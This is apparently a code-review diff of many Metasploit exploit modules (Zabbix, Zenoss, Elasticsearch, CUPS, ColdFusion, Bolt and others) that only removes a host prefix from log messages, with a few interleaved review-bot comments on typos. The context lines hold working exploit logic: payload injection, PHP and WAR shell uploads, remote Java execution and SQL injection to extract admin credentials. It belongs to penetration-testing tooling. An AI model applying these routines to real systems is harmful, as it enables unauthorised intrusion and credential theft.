@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - vprint_status("#{peer} - Zabbix version #{version} detected") + vprint_status("Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - vprint_status("#{peer} - Unable to access httpmon.php") + vprint_status("Unable to access httpmon.php") return Exploit::CheckCode::Unknown end @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 - print_status("#{peer} - Extracted session cookie - [ #{session} ]") + print_status("Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script - print_status("#{peer} - Attempting to inject payload") + print_status("Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script added)/ - print_status("#{peer} - Payload injected successfully") + print_status("Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end 
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" - print_status("#{peer} - Cleaning script remnants") + print_status("Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -173,9 +173,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script deleted)/ - print_status("#{peer} - Script removed successfully") + print_status("Script removed successfully") else - print_warning("#{peer} - Unable to remove script #{@scriptid}") + print_warning("Unable to remove script #{@scriptid}") end end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 9a3a544ed4..1097a5e7bf 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = rand(100) + 1 # send payload - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") + print_status("Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ 'uri' => '/index.cgi', 
diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 30baf11724..3a728421f4 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Save @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" # send payload - print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") + print_status("Sending payload to Zenoss (#{command.length.to_s} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -94,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "#{postdata}", }) if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ - print_error("#{peer} - Authentication failed. Incorrect username/password.") + print_error("Authentication failed. Incorrect username/password.") return end - print_status("#{peer} - Sent payload successfully") + print_status("Sent payload successfully") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") rescue - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end handler diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 7ee164b10b..2376559d8d 100644 
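Review bot: The context lines of the `@@ -73,7 +73,7 @@` hunk contain two misspelled constants that this edit leaves in place: `::Rex::ConnectionTimeoutp` in the `rescue` list and `Exploit::CheckCode::Save` on the final `return`. Ruby resolves the rescue list only when an exception is being matched, so a connection failure would surface as a `NameError` instead of reaching the `vprint_error("Connection failed")` line changed here, and the last `return` would fail the same way if it is ever reached. Since the line in between is being edited anyway, correct both: `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout` and `return Exploit::CheckCode::Safe`. The method starts outside the hunk.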
--- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - vprint_status("#{peer} - Sending 'Command' request...") + vprint_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - vprint_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ @@ -117,16 +117,16 @@ class Metasploit3 < Msf::Exploit::Remote cmd = payload.encoded connect - print_status("#{peer} - Sending 'Command' request...") + print_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /-1/ and res=~ /NODE (\d*)/ # Retry with the good node_id node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + print_good("Node ID #{node_id} discovered") connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + print_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect end 
@@ -134,10 +134,10 @@ class Metasploit3 < Msf::Exploit::Remote # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) if res and res =~ /\x30\xad/ - print_good("#{peer} - Command executed successfully") + print_good("Command executed successfully") print_status("Output:\n#{res.split("\x30\xad").last}") else - print_error("#{peer} - Failed to execute the command") + print_error("Failed to execute the command") end end diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index 5cb602e0b1..cbfa6a463a 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -97,7 +97,7 @@ class Metasploit4 < Msf::Exploit::Remote rescue peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Caught #{$!.class}: #{$!.message}") + vprint_status("Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index d6fb488e75..685a0ae6d7 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb 
@@ -65,30 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java...") + print_status("Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}'") + print_good("Remote OS is '#{result}'") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Discovering TEMP path") + print_status("Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}'") + print_good("TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else @@ -102,18 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'System.getProperty("java.class.path")' - vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...") + vprint_status("Trying to execute 'System.getProperty(\"java.version\")'...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - No results for the Java test") + vprint_status("No results for the Java test") return false elsif result =~ /elasticsearch/ - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return true else - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return false end end 
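Review bot: In `vulnerable?` (hunk `@@ -102,18 +102,18 @@`) the status line says it is executing `System.getProperty("java.version")`, but the expression assigned to `java` and passed to `execute` is `System.getProperty("java.class.path")`. The log therefore misreports which probe was sent, and the later `result =~ /elasticsearch/` test only makes sense for the class path. Build the message from the variable so the two cannot drift apart: `vprint_status("Trying to execute '#{java}'...")`.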
diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index 376acef76a..22409cadca 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -63,27 +63,27 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking vulnerability...") + print_status("Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering TEMP path...") + print_status("Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path on '#{tmp_dir}'") + print_good("TEMP path on '#{tmp_dir}'") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - Remote OS is '#{os}'") + print_good("Remote OS is '#{os}'") end if os =~ /win/i @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(tmp_file) - print_status("#{peer} - Trying to load metasploit payload...") + print_status("Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end 
@@ -102,12 +102,12 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' - vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") + vprint_status("Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - no response to test") + vprint_status("no response to test") return false elsif result == 'class java.lang.Runtime' return true @@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_result(res) unless res - vprint_error("#{peer} - No response") + vprint_error("No response") return nil end unless res.code == 200 && res.body - vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") + vprint_error("Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index eae0dc278f..5899e09be6 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_status("#{peer} - The server returned: #{res.code} #{res.message}") + print_status("The server returned: #{res.code} #{res.message}") m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' if m.empty? - print_error("#{peer} - This server may not be vulnerable") + print_error("This server may not be vulnerable") else - print_status("#{peer} - Command output from the server:") + print_status("Command output from the server:") print_line(m) end end diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 6b2f6d616e..a7a8dbd4f9 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb 
+++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--o0oOo0o\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), @@ -96,11 +96,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end end diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index b7017589ee..645a337f93 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), 
@@ -86,14 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end - print_status("#{peer} - Requesting '#{php_fname}'...") + print_status("Requesting '#{php_fname}'...") res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index ec8b0b4797..30b5987cb4 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), @@ -130,17 +130,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Bolt.") + vprint_good("Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? - vprint_good("#{peer} - Token \"#{token}\" found.") + vprint_good("Token \"#{token}\" found.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new 
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), @@ -158,17 +158,17 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_file_name) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 03028e468b..b3b854cee9 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") http_send_command(payload.raw) end end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index a0c6b0f4c6..348dea375a 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb 
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote war_filename = "#{app_base}.war" war_location = target['AutoDeployPath'] - print_status("#{peer} - Uploading WAR file #{war_filename}...") + print_status("Uploading WAR file #{war_filename}...") res = upload_file(war_location, war_filename, war) if res @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index bdeb327d67..758cbcf46e 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - vprint_good "#{peer} - Administrator access available" + vprint_good "Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - vprint_good "#{peer} - ColdFusion 9 Detected" + vprint_good "ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end @@ -192,8 +192,8 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload uri = target_uri.path - print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', 
@@ -207,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea - print_status "#{peer} - Trying to upload payload via scheduled task..." + print_status "Trying to upload payload via scheduled task..." res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'), @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good("#{peer} - Logged in as Administrator!") + print_good("Logged in as Administrator!") else fail_with(Failure::Unknown, "#{peer} - Login Failed") end @@ -259,12 +259,12 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/ file_path = $1 - print_good("#{peer} - File path disclosed! #{file_path}") + print_good("File path disclosed! #{file_path}") else fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath") end - print_status("#{peer} - Adding scheduled task") + print_status("Adding scheduled task") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'), @@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Running scheduled task") + print_status("Running scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), 
@@ -299,12 +299,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/ - print_good("#{peer} - Scheduled task completed successfully") + print_good("Scheduled task completed successfully") else fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Deleting scheduled task") + print_status("Deleting scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!") + print_error("Scheduled task deletion failed, cleanup might be needed!") end end end diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 399846da49..81897bc3e0 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb 
@@ -88,21 +88,21 @@ class Metasploit4 < Msf::Exploit::Remote printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ - vprint_status("#{peer} - Found CUPS version #{$1}") + vprint_status("Found CUPS version #{$1}") else - print_status("#{peer} - Target is not a CUPS web server") + print_status("Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ - vprint_good("#{peer} - Added printer successfully") + vprint_good("Added printer successfully") delete_printer(printer_name) elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") elsif res.code == 426 - vprint_error("#{peer} - SSL required - set SSL true") + vprint_error("SSL required - set SSL true") end Exploit::CheckCode::Detected end @@ -128,7 +128,7 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ - print_good("#{peer} - Added printer successfully") + print_good("Added printer successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 
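Review bot: In the `@@ -88,21 +88,21 @@` hunk the "Target is not a CUPS web server" branch uses `print_status`, while every other message in the same method is a `vprint_*` call. That makes this one line print when verbose output is off and the rest stay silent. Unless that is intended, make it `vprint_status("Target is not a CUPS web server")`. The method starts outside the hunk.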
@@ -144,7 +144,7 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ - vprint_good("#{peer} - Added test page to printer queue") + vprint_good("Added test page to printer queue") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 @@ -158,13 +158,13 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ - print_status("#{peer} - Deleted printer '#{printer_name}' successfully") + print_status("Deleted printer '#{printer_name}' successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") + vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") + vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else - vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") + vprint_warning("Could not delete printer '#{printer_name}'") end end @@ -172,7 +172,7 @@ class Metasploit4 < Msf::Exploit::Remote # Add a printer to CUPS # def add_printer(printer_name, cmd) - vprint_status("#{peer} - Adding new printer '#{printer_name}'") + vprint_status("Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF 
@@ -241,7 +241,7 @@ EOF # Queue a printer test page # def print_test_page(printer_name) - vprint_status("#{peer} - Adding test page to printer queue") + vprint_status("Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), @@ -258,7 +258,7 @@ EOF # Delete a printer # def delete_printer(printer_name) - vprint_status("#{peer} - Deleting printer '#{printer_name}'") + vprint_status("Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 63fc450568..865ca0fbd2 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -101,17 +101,17 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' # upload PHP payload to upload/___1/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end # retrieve and execute PHP payload - print_status("#{peer} - Retrieving file: #{fname}") + print_status("Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload/___1/#{fname}") diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 71c1b0a0c1..f999bafa7c 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb 
@@ -107,19 +107,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit payload_name = rand_text_alpha(rand(10) + 5) + '.php' - print_status("#{peer} - Using SQL injection to acquire credentials") + print_status("Using SQL injection to acquire credentials") user = database_get_field('users', 'name', 0) if user == false - print_error("#{peer} - Failed to acquire administrator username") + print_error("Failed to acquire administrator username") return end password = database_get_field('users', 'password', 0) if password == false - print_error("#{peer} - Failed to acquire administrator password") + print_error("Failed to acquire administrator password") end - print_status("#{peer} - Using #{user}:#{password}") + print_status("Using #{user}:#{password}") res = send_request_cgi({ 'method' => 'POST', @@ -135,9 +135,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.headers.has_key?('Location') login_cookie = res.get_cookies - print_status("#{peer} - Login successful") + print_status("Login successful") else - print_error("#{peer} - Failed to log in") + print_error("Failed to log in") return end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => upload, @@ -159,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote path = $1 path = path.sub! "\\", "/" target_path = normalize_uri(target_uri.path, path) - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler else - print_error("#{peer} - Failed to upload file") + print_error("Failed to 